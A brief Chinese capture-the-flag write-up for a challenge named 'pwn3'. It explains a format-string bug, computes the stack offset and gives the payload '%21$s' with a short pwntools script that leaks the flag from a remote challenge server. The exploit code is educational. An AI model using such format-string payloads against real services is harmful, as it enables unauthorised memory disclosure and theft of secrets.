pwn3

一道格式化字符串题

checksec

首先看main函数，一眼格式字符串漏洞。发现开头有个read_flag，不妨进去看看

这段代码最后将flag复制给了dest，结合main函数中的ptr = (void *)read_flag(argc, argv, envp)也就是说ptr里即是flag。

再看看最关键的一点

ptr与rsp的距离为0x78，也就是说15个位置。那么答案就很明显了

'%21$s'//6(rsi rdx rcx r8 r9 rsp)+15=21

其实直接nc就得了

from pwn import*
p=remote('150.138.81.18',11296)
payload=b'%21$s'
p.sendline(payload)
p.interactive()

未完待续😄剩下的明天写